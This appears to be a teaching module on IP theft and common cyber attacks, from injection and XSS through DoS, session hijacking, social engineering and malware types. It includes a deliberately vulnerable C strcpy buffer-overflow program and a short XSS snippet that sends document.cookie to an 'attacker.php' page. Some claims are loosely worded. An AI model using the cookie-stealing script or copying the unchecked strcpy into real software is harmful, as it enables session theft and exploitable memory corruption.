Module 3

MODULE 3

IP Theft and Types of Attacks

What is IP?
IP stands for Intellectual Property. Intellectual property (IP) refers to creations of the mind,
such as inventions literary and artistic works, designs, and symbols, names and images used for
business to generate profits.
Types of Intellectual Property?

• Patents:
A patent is an exclusive right granted for an invention. A patent provides the patent
owner with the right to decide how or if their invention can be used by others. In
exchange for this exclusivity, the patent owner makes technical information about the
invention publicly available in the published patent document.

• Trade Marks:
A trademark is a sign capable of distinguishing the goods or services of one enterprise
from those of other enterprises. Trademarks originated in ancient times when artisans
used to put their signature or "mark" on their products.

• Designs:
An industrial design composes the ornamental or aesthetic aspect of an article. A design
may consist of two-dimensional features, such as patterns, lines or color, or three-
dimensional features, such as the shape or surface of an article.

• Copyrights:
Copyright is a legal term used to describe the rights that creators have over their literary
and artistic works. Books, music, paintings, sculpture and films, to computer programs,
databases, advertisements, maps and technical drawings are all covered by copyright

• Trade Secrets
A trade secret is a type of intellectual property in the form of a formula, practice,
process, design, instrument, pattern, commercial method, or compilation of information

not generally known or reasonably discoverable by others, by which a business can
obtain an economic advantage over competitors or customers.

What can be Stolen as IP?

• Idea/ Inventions/ Creative Expression
• Products
• Designs
• Product Specification
• Process Information and Methodologies
• Manufacturing Process
• Business Method

TYPES OF ATTACK?

Here we are discussing 2 types of attacks which are:
1. Web Based Attack.
2. System Based Attack.

What is Web Based Attacks?

Web based attacks are considered to be the greatest and often the least understood of all risks
related to confidentiality, availability, and integrity. The aim of a web-based attack is
significantly different than other attacks. A network or host is the target of attack in most
traditional penetration testing exercises. Web based attacks are centered around an application
itself and functions on layer 7 of the OSI. John Pescatore of the Gartner group claims that nearly
70% of all attacks occur at the application layer.
Application vulnerabilities could provide the manner in which malicious end users breach a
system's protection mechanisms usually to take advantage or gain access to private information
or system resources. Information gathered could include social security numbers, dates of birth,
and maiden names, which are all often used in identity theft. Another popular target for
attackers is credit card data. Left unprotected and unencrypted, they can be used to cause
significant damage to organizations most valued assets, their customers. So what makes up an
application attack? By definition, all web application attacks are comprised of at least one

normal request or a modified request aimed at taking advantage of poor parameter checking or
instruction spoofing.

There are six fundamental categories of application attacks.

• Spoofing:
Spoofing is the act of imitating another user or process to perform a task or retrieve
information that would normally not be allowed. An attacker could use a crafted HTTP
request containing the session id information from another user and retrieve the
targeted users account information.

• Repudiation:
Applications must have reasonable repudiation controls such as web access,
authentication, and database transaction logs in order to tie specific actions of a single
user. Without confirming logs, online web application users could easily claim that they
did not transfer equities from one account to an external account of another. Otherwise
without proof otherwise all online brokerages would be required to reimburse the client
for lost funds. Collecting and correlating logs from multiple sources (web application,
middleware, and database) can prevent repudiation attacks.

• Information Disclosure:
Information disclosure is one of the biggest threats to large organizations who maintain
private information about their customer base. When attackers can reveal private
information about a user or users of a web site, consumer confidence in that
organization can take drastic hits causing loss in sales, stock price, and overall
marketability. Applications must require adequate controls which will prevent user ID
and session manipulation to prevent this

• Denial of Service:
Denial of service attacks are one of the most widely-known of all application attacks.
They are often generated by malicious users, competitors or script kiddies. Motivations
for this type of an attack range from personal to political reasons in hopes of stifling an
organization’s ability to field online business.

• Elevation of Privileges:
Authorization controls which are both reliable and staunch are requirements for any
system or application which guards sensitive information. This requires a malicious user
to either already possess or gain through unlawful methods authorization privileges of a
regular user. Once the malicious user is logged into the victim system, an attempt will
be made by exploitation of an application through poor parameter checking or
instruction spoofing.

Types of Web based Attacks:

1. Injection Attack:

Injection attacks refer to a comprehensive class of attack vectors that allow an attacker
to supply untrusted input to a program, which gets processed by an interpreter as part
of a command or query which alters the course of execution of that program. They are
amongst the oldest and most dangerous web application attacks. They can result in data
theft, loss of data integrity, data loss, denial of service, as well as full system
compromise.

Injection is a major problem in web security. Injection attacks, particularly SQL injection
(SQLi), are not only very dangerous

Types of Injection Attacks

1. SQL injection (SQLi)
2. Cross-site Scripting (XSS)
3. Code injection
4. CRLF injection
5. Email (Mail command/SMTP) injection
6. Host Header injection
7. LDAP injection
8. OS Command injection
9. XPath injection

2. File Inclusion:

A file inclusion vulnerability allows an attacker to access unauthorized or sensitive files
available on the web server or to execute malicious files on the web server by making
use of the ‘include’ functionality. This vulnerability is mainly due to a bad input
validation mechanism, wherein the user’s input is passed to the file include commands
without proper validation.

There are 2 types of file inclusion.

1. Remote File Inclusion.
2. Local File Inclusion.

Remote File Inclusion:

Remote file inclusion allows an attacker to include and execute a remotely hosted file
using a script by including it in the attack page. The attacker can use RFI to run a
malicious code either on the server or on the client side. The impact of this attack can

vary from temporary theft of stealing session tokens or data when the target is client, to
complete system compromise when the target is the application server.

Local File Inclusion:

The local file inclusion vulnerability is a process of including the local files available on
the server. This vulnerability occurs when a user input contains the path to the file that
has to be included. When such an input is not properly cleared, the attacker may give
some default file names and access unauthorized files. An attacker may also make use of
directory traversal characters and retrieve sensitive files available in other directories.

3. Cross-Site Scripting:

Cross site scripting (XSS) is a common attack vector that injects malicious code into a
vulnerable web application. XSS differs from other web attack vectors such as SQL
injections as it does not directly target the application itself. The users of the web
application are the ones at risk to this type of attack.

Cross site scripting attacks can be of two types: stored and reflected.

• Stored XSS occurs when a malicious script is injected directly into a vulnerable
web application. It also known as persistent XSS and is the more damaging of the
two.

• Reflected XSS involves the reflecting of a malicious script off of a web
application, onto a user’s browser. The script is embedded into a link, and is only
activated once that link is clicked on.

4. DNS SPOOFING ATTACK

DNS spoofing occurs when a particular DNS server’s records of “spoofed” or altered
maliciously to redirect traffic to the attacker. This diversion of traffic allows the attacker
to steal data, spread malware, etc. For example, if a DNS record is spoofed, then the
attacker can manage to divert all the traffic that relied on the correct DNS record to visit
a fake website that the attacker has created to resemble the real site or a different site
completely.

How does a DNS Spoofing work?

DNS spoofing can be carried out using various methods such as:

• DNS cache poisoning
• Compromising a DNS server

• Implementing a Man in the Middle Attack

However, an attacker’s end goal is usually the same no matter which method they use.
Either they want to steal information, re-route you to a website that benefits them, or
spread malware. The most analyzed method to perform DNS spoofing is using cache
poisoning which we’ll explain next.

DNS Cache Poisoning

Since DNS servers cache the DNS translation for faster, more efficient browsing,
attackers can take advantage of this to perform DNS spoofing. If an attacker is able
to inject a forged DNS entry into the DNS server, all users will now be using that forged
DNS entry until the cache expires. Once the cache expires, the DNS entry will return to
normal as the DNS server will go through the complete DNS lookup process again.
However, if the DNS server’s software still hasn’t been updated, then the attacker can
duplicate this error and continue siphoning visitors to their website.

DNS cache poisoning can sometimes be quite difficult to notice. If the malicious website
is very similar to the website it is trying to impersonate, some users may not even notice
the difference. Additionally, if the attacker is using DNS cache poisoning to compromise
one company’s DNS records in order to have access to their emails for example, then
this may also be difficult to detect.

5. Denial of Service (DoS) & (DDoS):

A Denial-of-Service (DoS) attack is an attack meant to shut down a machine or network,
making it inaccessible to its intended users. DoS attacks accomplish this by flooding the
target with traffic, or sending it information that triggers a crash.

Victims of DoS attacks often target web servers of high-profile organizations such as
banking, commerce, and media companies, or government and trade organizations.
While DoS attacks do not normally result in the theft or loss of significant information or
other assets, they can cost the victim a great deal of time and money to handle.

There are two general methods of DoS attacks:

• flooding services
• crashing services

Flood attacks occur when the system receives too much traffic for the server to buffer,
causing them to slow down and eventually stop.

Popular flood attacks include:

• Buffer overflow attacks – the most common DoS attack. It is based on the
concept to send more traffic to a network address than the programmers have
built the system to handle. It includes the attacks listed below, in addition to
others that are designed to exploit bugs distinct to certain applications or
networks

• ICMP flood – This attack takes advantage of misconfigured network devices by
sending spoofed packets that ping every computer on the targeted network,
instead of just one specific machine. The network is then triggered to amplify the
traffic. It is also known as the ping of death or smurf attack.

• SYN flood – sends a request to connect to a server, but never completes it. It
continues until all open ports are saturated with requests and none are available
for legitimate users to connect to.

What is DDOS Attack?

A distributed denial-of-service (DDoS) attack is an attack in which several compromised
computer systems attack a target, such as a server, website or other network resource,
and cause a denial of service for users of the targeted resource. The bombardment of
incoming messages, connection requests or malformed packets to the target system
forces it to slow down or even crash and shut down, thereby denying service to
legitimate users or systems.

In a typical DDoS attack, the assailant begins by exploiting a vulnerability in one
computer system and making it the DDoS master. The attack master system identifies
other vulnerable systems and, by either infecting the systems with malware or through
bypassing the authentication controls, gains control over them.

A networked device or a computer under the control of an intruder is known as
a zombie, or bot. The attacker creates what is called a command-and-control server to
command the network of bots, also called a botnet. The person in control of a botnet
can be sometimes referred to as the botmaster. Historically, this term has been used to
refer to the first system "acquired” into a botnet because it is used to control the spread
and activity of other systems in the botnet.

Botnets can be comprised of almost any number of bots; botnets with tens or hundreds
of thousands of nodes have become increasingly common, and there may not be an
upper limit to their size. Once the botnet is assembled, the attacker can use the traffic
generated by the compromised devices to flood the target domain and knock it offline.

6. Dictionary Attack:

The dictionary attack uses a simple file containing words that can be found in a
dictionary, hence its rather straightforward name. In other words, this attack uses
exactly the kind of words that many people use as their password.

7. Brute Force Attack:

The brute force attack is similar to the dictionary attack but comes with an added bonus
for the hacker. Instead of just using words, a brute force attack lets them detect non-
dictionary words by working through all possible alpha-numeric combinations from aaa1
to zzz10.

It’s not quick, provided your password is over a handful of characters long, but it will
eventually uncover your password. Brute force attacks can be shortened by throwing
additional computing horsepower, in terms of both processing power – including
harnessing the power of your video card GPU

8. Buffer Overflow Attack:

A buffer is a temporary area for data storage. When more data gets placed by a program
or system process, the extra data overflows. It causes some of that data to leak out into
other buffers, which can corrupt or overwrite whatever data they were holding.

In a buffer-overflow attack, the extra data sometimes holds specific instructions for
actions planned by a hacker or malicious user. For instance, the data could trigger a
response that damages files, changes data or unveils private information.

Attackers would use a buffer-overflow exploit to take advantage of a program that is
waiting on a user’s input.

There are two types of buffer overflows:

• stack-based
• heap-based

Heap-based, which are difficult to execute and the least common of the two, attack an
application by flooding the memory space reserved for a program. Stack-based buffer
overflows, which are more common among attackers, exploit applications and programs
by using what is known as a stack: memory space used to store user input.

Let us study some real program examples that show the danger of such situations based
on the C.

// A C program to demonstrate buffer overflow

#include <stdio.h>

#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{

// Reserve 5 byte of buffer plus the terminating NULL.
// should allocate 8 bytes = 2 double words,
// To overflow, need more than 8 bytes...
char buffer[5]; // If more than 8 characters input

// by user, there will be access
// violation, segmentation fault

// a prompt how to execute the program...
if (argc < 2)
{

printf("strcpy() NOT executed....\n");
printf("Syntax: %s <characters>\n", argv[0]);
exit(0);
}

// copy the user input to mybuffer, without any
// bound checking a secure version is srtcpy_s()
strcpy(buffer, argv[1]);
printf("buffer content= %s\n", buffer);

// you may want to try strcpy_s()

printf("strcpy() executed...\n");

return 0;

}

Compile this program in Linux and for output use command outpute_file INPUT

Input : 12345678 (8 bytes), the program run smoothly.

Input : 123456789 (9 bytes)
"Segmentation fault" message will be displayed and the program terminates.

The vulnerability exists because the buffer could be overflowed if the user input
(argv[1]) bigger than 8 bytes. Why 8 bytes? For 32 bit (4 bytes) system, we must fill up a
double word (32 bits) memory. Character (char) size is 1 byte, so if we request buffer
with 5 bytes, the system will allocate 2 double words (8 bytes). That is why when you
input more than 8 bytes; the mybuffer will be over flowed

Similar standard functions that are technically less vulnerable, such as strncpy(),
strncat(), and memcpy(), do exist. However, the problem with these functions is that the
programmer is responsible to assert the size of the buffer, not the compiler.

Every programmer must be familiar with the buffer overflow problem before they start
coding. A lot of bugs generated, in most cases can be exploited as a result of buffer
overflow.

9. Session Hijacking:

Computer session in normal day-to-day speak is a temporary interaction you have with a
website. For example, A session is the time between you first log into your bank account
and then log off after your operation.

What is Session Hijacking?

TCP session hijacking is a security attack on a user session over a protected network. The
most common method of session hijacking is called IP spoofing. It occurs when an
attacker uses source-routed IP packets to insert commands into an active
communication between two nodes on a network while disguising itself as one of the
authenticated users. This type of attack is possible because authentication typically is
only done at the beginning of a TCP session.

Another type of session hijacking is known as a man-in-the-middle attack. Using a
sniffer, the attacker can observe the communication between devices and collect the
data that is transmitted.

The session token could be compromised in multiple ways. The most common are:

• Predictable session token;
• Session Sniffing;
• Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);
• Man-in-the-middle attack
• Man-in-the-browser attack
• Using Packet Sniffers

Using Packet Sniffers

In the above figure, it can be seen that attack captures the victim’s session ID to gain access to
the server by using some packet sniffers.

Cross Site Scripting (XSS Attack)
Attackers can also capture victim’s Session ID using XSS attack by using JavaScript. An
attacker sends a crafted link to the victim with the malicious JavaScript. When the victim
clicks on the link, the JavaScript will run and complete the instructions devised by the
attacker.
<SCRIPT type="text/javascript">
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
</SCRIPT>

IP Spoofing
Spoofing is pretending to be someone else. This is a technique used to gain prohibited
access to the computer with an IP address of a trusted host. In implementing this
technique, attacker has to obtain the IP address of the client and inject his own packets
spoofed with the IP address of client into the TCP session, so as to trick the server that it
is communicating with the victim i.e. the original host.

Blind Attack
If an attacker is not able to sniff packets and guess the correct sequence number
expected by server, brute force combinations of sequence number can be tried.

Mitigation

To defend a network with session hijacking, a defender has to implement both security
measures at Application level and Network level. Network level hijacks can be
prevented by ciphering the packets so that the hijacker cannot decipher the packet
headers to obtain any information which will help in spoofing. This encryption can be
provided by using protocols such as IPSEC, SSL, SSH etc. Internet security protocol
(IPSEC) has the means to encrypt the packet on some shared key between the two
parties involved in communication. IPsec runs in two modes: Transport and Tunnel.
In Transport Mode only the data sent in the packet is encrypted while in Tunnel Mode
both packet headers and data are encrypted, so it is more restrictive.

Session hijacking is a grave threat to networks and web applications as most of the
systems are vulnerable to it.

10. Social Engineering Attack:
Social Engineering is a one type of attack vector or intension to get the information
about victim by manipulating peoples.

What is Social Engineering?

Social engineering is the term used for a wide scope of malicious activities accomplished
through human interactions. It uses psychological manipulation to con users into making
security mistakes or giving away sensitive information.

Social engineering attacks happen in one or more steps. A perpetrator first researches
the intended victim to gather necessary background information, such as potential
points of entry and weak security protocols, needed to proceed with the attack. Then,
the attacker moves to gain the victim’s trust and provide circumstances for subsequent
actions that break security practices, such as revealing sensitive information or granting
access to critical resources.

Social Engineering Life Cycle

What makes social engineering especially dangerous is that it relies on human error,
rather than vulnerabilities in software and operating systems. Mistakes made by
legitimate users are much less predictable, making them harder to identify and thwart
than a malware-based intrusion.

Social engineering attack techniques

Social engineering attacks come in various forms and can be performed anywhere
where human interaction is involved. The following are the five most common forms of
digital social engineering assaults:

Baiting

As its name implies, baiting attacks use a false promise to provoke a victim’s greed or
curiosity. They lure users into a trap that steals their personal information or inflicts
their systems with malware.

The most condemned form of baiting uses physical media to disperse malware. For
instance, attackers leave the bait—typically malware-infected flash drives—in
conspicuous areas where potential victims are certain to see them such as bathrooms,
elevators, the parking lot of a targeted company. The bait has an authentic look to it,
such as a label presenting it as the company’s payroll list. Victims pick up the bait out of
curiosity and insert it into a work or home computer, resulting in automatic installation
of malware in the system.

Baiting scams don’t necessarily have to be carried out in the physical world. Online,
baiting consists of attractive advertisements that lead to malicious sites or that
encourage users to download a malware-infected application.

Scareware

Scareware involves victims being swamped with false alarms and fictitious threats.
Users are tricked into thinking their system is infected with malware, prompting them to
install software that has no real benefit (other than for the perpetrator) or is malware
itself. Scareware is also referred to as deception software, rogue scanner software and
fraudware.

A common scareware example is the legitimate-looking popup banners appearing in
your browser while surfing the web, displaying such text such as, “Your computer may
be infected with harmful spyware programs.” It either offers to install the tool (often
malware-infected) for you, or will direct you to a malicious site where your computer
becomes infected.

Scareware is also distributed via spam email that doles out bogus warnings, or makes
offers for users to buy worthless/harmful services.

Pretexting

Here, attackers obtain information through a series of cleverly crafted lies. The scam is
often commenced by a perpetrator pretending to need sensitive information from a
victim to perform a dire task.

The attacker usually starts by establishing trust with their victim by impersonating co-
workers, police, bank and tax officials, or other persons who have right-to-know
authority. The pre-texter asks questions that are ostensibly required to confirm the
victim’s identity, through which they gather important personal data.

All sorts of pertinent information and records is gathered using this scam, such as social
security numbers, personal addresses and phone numbers, phone records, staff
vacation dates, bank records and even security information related to a physical plant.

Phishing

As one of the most popular social engineering attack types, phishing scams are email
and text message campaigns aimed at creating a sense of urgency, curiosity or fear in
victims. It then urges them into revealing sensitive information, clicking on links to
malicious websites, or opening attachments that contain malware.

For example, an email sent to users of an online service that alerts them of a policy
violation requiring immediate action on their part, such as a required password change.
It includes a link to an illegitimate website—nearly identical in appearance to its
legitimate version— encouraging the oblivious user to enter their current credentials
and new password. Upon form submittal the information is sent to the attacker.

Given that identical, or near-identical, messages are sent to all users in phishing
campaigns, detecting and blocking them are much easier for mail servers having access
to threat sharing platforms.

Spear phishing

This is a more targeted version of the phishing scam whereby an attacker chooses
specific individuals or enterprises. They then customize their messages based on
characteristics, job positions, and contacts belonging to their victims to make their
attack less detectable. Spear phishing requires much more effort on behalf of the
perpetrator and may take weeks and months to pull off. They’re much harder to detect
and have better success rates if done skillfully.

A spear phishing scenario might involve an attacker who, in impersonating an
organization’s IT consultant, sends an email to one or more employees. It’s worded and
signed exactly as the consultant normally does, thereby deceiving recipients into
thinking it’s an authentic message. The message prompts recipients to change their

password and provides them with a link that redirects them to a malicious page where
the attacker now captures their credentials.

SYSTEM BASED ATTACKS

Viruses, worms, Trojans, and bots are all part of a class of software called "malware."
Malware is short for "malicious software," also known as malicious code or "malcode."
It is software or code that is specifically produced to damage, disrupt, steal, or in
general inflict some other illegitimate action on data, hosts, or networks.

There are many different classes of malware that have varying ways of infecting systems
and propagating themselves. Malware can infect systems by being packaged with other
programs or attached as macros to files. Others are installed by exploiting a known
vulnerability in an operating system (OS), network device, or other software. However,
the clear majority are installed due to some action from the user, such as clicking an
email attachment or downloading a file from the Internet.

Damage from malware varies from causing minor irritation (such as browser popup ads),
to destroying data, stealing confidential information or money, and compromising or
entirely immobilizing systems and networks.

Classes of Malicious Software

Viruses and Worms are the two most common types of malware. These types of programs are
able to clone themselves and can spread copies of themselves , which may even be modified
copies.

These and other classes of malicious software are described below:

Ransomware

Ransomware is a type of malicious software that threatens to publish the victim's data or
perpetually block access to it unless a ransom is paid. Some simple ransomwares may lock the
system in a way that is not difficult for a knowledgeable person to reverse. However, more
advanced malware use a technique called cryptoviral extortion, which encrypts the victim's
files, making them inaccessible, and demands a ransom payment to decrypt them.

Viruses

A computer virus is a type of malware that generates by inserting a copy of itself into and
becoming part of another program. It spreads infections as it travels from one computer to
another. Viruses can range in severity from causing mildly annoying effects to damaging data or
software and causing denial-of-service (DoS) conditions. Almost all viruses are attached to
an executable file. This means the virus may exist on a system but will not be active or able to

spread until the user runs or opens the malicious host file or program. When the host code is
executed, the viral code is executed as well. Usually, the host program keeps functioning after it
is infected by the virus. However, some viruses overwrite other programs with clones of
themselves, which decimate the host program altogether. When the software or document
they are attached to is transferred from one computer to another using the network, file
sharing, a disk, or infected email attachments, viruses are spread.

Worms

Computer worms are similar to viruses in that they replicate functional copies of themselves
and can cause the same type of damage. While viruses require the spreading of an infected
host file, worms are standalone software and do not require a host program or human help to
spread. Worms either exploit a vulnerability on the target system or use some kind of social
engineering to fool users into executing them. A worm enters a computer through a
vulnerability in the system and takes advantage of file-transport or information-transport
features on the system, allowing it to travel independently. More advanced worms use
encryption, wipers, and ransomware technologies to harm their targets.

Trojans

A Trojan is another type of malware named after the historic wooden horse that the Greeks
used to infiltrate Troy. It is a damaging piece of software that looks legitimate. Users are
typically deceived into loading and executing it on their systems. After activation, it can fulfill
any number of attacks on the host, from infuriating the user (popping up windows or changing
desktops) to damaging the host (deleting files, stealing data, or activating and spreading other
malware, such as viruses). Trojans are also known to create backdoors to give malicious users
access to the system. Trojans do not reproduce by infecting other files nor do they self-replicate
like viruses and worms. They must spread through user interaction such as opening an email
attachment or downloading and running a file from the Internet.

Bots

"Bot" is derived from the word "robot". It is an automated process that interacts with other
network services. Bots often automate tasks and provide information or services easily that
would or else be conducted by a human being. A typical use of bots is to gather information,
such as web crawlers, or interact automatically with Instant Messaging (IM), Internet Relay Chat
(IRC), or other web interfaces. They may also be used to interact dynamically with websites.

Bots can be used for good or malicious purposes. A malicious bot is self-propagating malware
designed to infect a host and connect back to a central server or servers that act as a command
and control (C&C) center for an entire network of compromised devices.This network is also
called the botnet. With a botnet, attackers can launch a wide remote-controlled flood-type
attacks against their targets.

Along with the ability to self-propagate like worms, bots can include the ability to log
keystrokes, capture and analyze packets, gather passwords, gather financial information,
launch Denial of Service (DOS) Attacks, relay spam, and open backdoors on the infected host.
Bots have all the benefits of worms but are generally much more adaptable in their infection
vector and are often modified within hours of publication of a new exploit. They have been
known to exploit backdoors opened by worms and viruses, which allows them to access
networks that have good perimeter control. Bots rarely notify their presence with high scan
rates that damage network infrastructure. Alternatively, they infect networks in a way that
escapes immediate notice.

Advanced botnets may take advantage of common internet of things (IOT) devices such as
home electronics or appliances to increase automated attacks. Crypto mining is a common use
of these bots for nefarious purposes.

Adware

Software that generates revenue for its developer by automatically generating online
advertisements in the user interface of the software or on a screen presented to the user
during the installation process. The software may generate two types of revenue: one is for the
display of the advertisement and another on a "pay-per-click" basis if the user clicks on the
advertisement.

Backdoor

An undocumented way of accessing a system, bypassing the normal authentication
mechanisms. Some backdoors are placed in the software by the original programmer. Others
are placed on systems through a system compromise, such as a virus or worm. Usually,
attackers use backdoors for easier and continued access to a system after it has been
compromised.

Bootkit

A malware variant that modifies the boot sectors of a hard drive, including the Master Boot
Record (MBR) and Volume Boot Record (VBR). Attackers may use bootkits to linger on systems
at a layer below the operating system, which may make it difficult to perform full restoration
unless an organization suspects one was used and can act accordingly.

References

• Sans Institute InfoSec Reading Room: Web based attacks
https://www.sans.org/reading-room/whitepapers/application/paper/2053

• What is DNS Spoofing?
https://www.keycdn.com/support/dns-spoofing

• File Inclusion Attacks- Aerosol
https://rstforums.com/forum/topic/86844-file-inclusion-attacks/

• File Inclusion Attacks-Infosec Institute
https://resources.infosecinstitute.com/file-inclusion-attacks/

• What makes a distributed Denial of service attack “Distributed”? -Brainly
https://brainly.com/question/11028042

• Can you write a piece of code that is susceptible to be hacked and then demonstrate
how a hacker would hack it?
https://www.quora.com/Can-you-write-a-piece-of-code-that-is-susceptible-to-be-
hacked-and-then-demonstrate-how-a-hacker-would-hack-it

• Java security Misc
https://massivetechinterview.blogspot.com/2015/09/java-security-misc.html

• What is Social Engineering- Imperva
https://www.imperva.com/learn/application-security/social-engineering-attack/

• What Is the Difference: Viruses, Worms, Trojans, and Bots? – Cisco
https://www.cisco.com/c/en/us/about/security-center/virus-differences.html

• What is trojan and backdoor?
https://www.quora.com/What-is-trojan-and-backdoor

• Malware: Viruses in Attachments in Emails- What you need to know
https://www.consumerfraudreporting.org/malware/MalwareInEmails.php